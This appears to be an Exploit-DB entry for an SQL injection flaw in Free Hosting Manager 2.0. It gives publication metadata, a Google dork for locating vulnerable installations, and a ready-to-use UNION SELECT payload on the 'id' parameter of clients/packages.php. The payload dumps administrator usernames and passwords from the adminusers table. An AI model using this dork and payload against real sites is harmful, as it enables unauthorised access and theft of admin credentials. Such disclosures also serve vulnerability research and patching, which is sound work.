Free Hosting Manager 2.0 - 'id' SQL Injection
Author: Yakir Wizman
type: webapps
platform: php
port:
date_added: 2012-11-30
date_updated: 2016-12-15
verified: 1
codes: OSVDB-88063
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt23500/screen-shot-2012-12-01-at-91634-am.png
application_url: http://www.exploit-db.comFree_Hosting_Manager_V2.0.2.zip
##########################################################################
## Free Hosting Manager V2.0 SQL Injection Vulnerability
## Google Dork: inurl:clients/packages.php?id=1
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
## Date: 29/11/2012
## Version: 2.0
## Software Link: http://www.fhm-script.com/download.php
## ISRAEL
##########################################################################
## Author will be not responsible for any damage.
##########################################################################
## SQL Injection PoC:
## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23
##########################################################################
# 0x31337.net
##########################################################################